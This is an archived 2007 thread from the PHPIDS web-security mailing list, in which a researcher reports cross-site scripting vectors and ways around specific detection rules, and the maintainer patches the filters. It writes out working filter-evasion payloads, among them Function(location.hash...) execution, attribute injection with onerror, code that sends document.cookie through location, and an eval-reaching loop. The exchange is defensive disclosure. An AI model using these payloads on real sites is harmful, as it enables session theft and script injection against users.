About new XSS vectors and some PHP-IDS filters

233 views
Skip to first unread message

SirDarckCat

unread,
Jul 2, 2007, 3:52:54 AM7/2/07
to PHPIDS » Web Application Security 2.0, h...@ckers.org, 0x00...@trashmail.net
XSS Vectors:

There are some characteristics in internet explorer that could aid
attackers when doing XSS attacks.

In IExplorer:
??script:
and
???script:
are translated to vbscript:
so, for example:
MYscript:msgbox("hi")
or
YOUscript:msgbox("hi")
will be treated as:
vbscript:msgbox("hi")
and anything with:
????script:
will be treated as:
javascript:
so..
somescript:alert("hi");
will be treated as:
javascript:alert("hi");

About PHPIDS:

The following expression is not filtered:

document.location.search.substr(1)

document.location.search returns the variables sent as GET content.

The website:
http://site.com/?something here

document.location.search returns "something here"

There is not filter for document.referrer:
document.referrer.substr(32)

So for example, I could make a website:
http://www.attacker.com/red.php?code-here()

that redirects to the vulnerable site and the program would execute
"code-here()".

!!! --- The filter doesnt make any validation for VBScript. --- !!!

About the rule:
rule: (?:(?:location)?[. ]*hash[. ]*(?:substr(?:ing)?|replace)\s?\()
rule-description: detects self contained xss payload attacks
impact: 4

Ways of avoiding that rule:

document.location.hash.split(document.location.hash.charAt(0)).join()
document.location.hash[String().substr.toString().substr(9,6)](1)

About the rule:
rule: (?:(?:alert|prompt|confirm|dialog|expression|urn|fromCharcode|
decodeURIComponent...
rule-description: detects possible includes and typical script
methods
impact: 5

Ways of avoiding that rule:
window[eval.toString().substr(9,4)](--code_here--)
Function(--code_here--)();

Use of both vulnerabilities, for example:


Function(document.location.hash[String().substr.toString().substr(9,6)]
(1))();

Could led to running the code inside http://site.com/#code-here


:)
Greetz!!

Att.
sirdarckcat

.mario

unread,
Jul 2, 2007, 4:00:57 AM7/2/07
to PHPIDS » Web Application Security 2.0
Hi!

Welcome to the group and thanks a lot! I will review the suggestions
immediately and upgrade the filter rules. (Wow - I didn't know about
the ???script issue!)

Greetings,
.mario

> Could led to running the code insidehttp://site.com/#code-here
>
> :)
> Greetz!!
>
> Att.
> sirdarckcat

.mario

unread,
Jul 2, 2007, 4:37:03 AM7/2/07
to PHPIDS » Web Application Security 2.0
Hi!

Ok - after having stopped shivering I customized the rules and
deployed them to the smoketest. Thanks for the awesome input - very
much appreciated!

Greetings,
.mario

SirDarckCat

unread,
Jul 2, 2007, 7:08:16 PM7/2/07
to PHPIDS » Web Application Security 2.0, h...@ckers.org
Hi!

Thanks for the welcome :)

there is another flaw in php-ids filters, this string:

x' y" z" awesome"whatever='something'

will allow me to put anything inside any attribute:

If you see the generated DOM code (in firefox), you can see that:

<a href="x' y" z" awesome"whatever='something'">
and
<a href='x' y" z" awesome"whatever='something''>
and
<a href=x' y" z" awesome"whatever='something'>

will be translated to:

double quoted:
<a href="?test=x%27%20y" z="" awesome="" whatever="something">

single quoted:
<a href="?test=x" y="" z="" awesome="" whatever="something">

no quotes:
<a href="?test=x%27" y="" z="" awesome="" whatever="something">

the important part is:
whatever="something"

I cant put onclick, nor onmousemove, etc.. but I thing that using
style could led to exploiting.. I'm not really sure..
anyway, if the affected zone instead of being an <a href were <img, I
think I could exploit it successfully.

This may be useful for the XSS cheat list of rsnake..

Greetz!!

SirDarckCat

unread,
Jul 2, 2007, 10:01:33 PM7/2/07
to PHPIDS » Web Application Security 2.0
Hi, one more thing.

the use of "with" is not filtered:

with(document)location.href=cookie;

Greetz!!

.mario

unread,
Jul 3, 2007, 4:55:19 AM7/3/07
to PHPIDS » Web Application Security 2.0
Hi!

Thanks again for your great work - it's a bgreat benefit for the group
to have you aboard!

I just fixed the filter rules and uploaded them for the demo. As far
as I can see they now cover all problems appearing in the slackers
forum and this thread.

x' y" z" awesome"onerror='alert(1)' is now triggering an impact of 13
which i find suitable.

Also the pattern foo(bar), foo["bar"], foo().bar(), and new Function
foo("bar") are now covered - I hope that doest it for now ;)

Also I tried to fix the with() issue more effectively although this
rule need more work.

Greetings!
.mario

SirDarckCat

unread,
Jul 3, 2007, 9:41:08 AM7/3/07
to PHPIDS » Web Application Security 2.0
Hello

I'm having a lot of fun with this filters :P, is the best challenge
I've seen in a long time

there is another flaw, this is an error in the handling of the new
lines..

for example:

for each(screw
in window)try{screw(code
)}catch(rock_and_roll){1}

after a lot of alerts, and confirms, the function "eval" will be
reached.. and will execute the code inside the variable code.

The variable code may be inputed like this:

var code;
code + = "alert";
code + = "\
(";
code + = "document";
code + = ".";
code + = "cookie";
code + = " \
); 123456 ";


Greetz!!

.mario

unread,
Jul 3, 2007, 6:09:52 PM7/3/07
to PHPIDS » Web Application Security 2.0
Hi!

"I'm having a lot of fun with this filters :P, is the best challenge
I've seen in a long time"

Nice to hear - thanks!

Again very high quality and esoteric stuff! The for each() construct
is now being detected but the concatenation makes me headache... What
do you guys think - would it be useful to create a concatenation
converter?

Greetings,
.mario

Reply all
Reply to author
Forward
0 new messages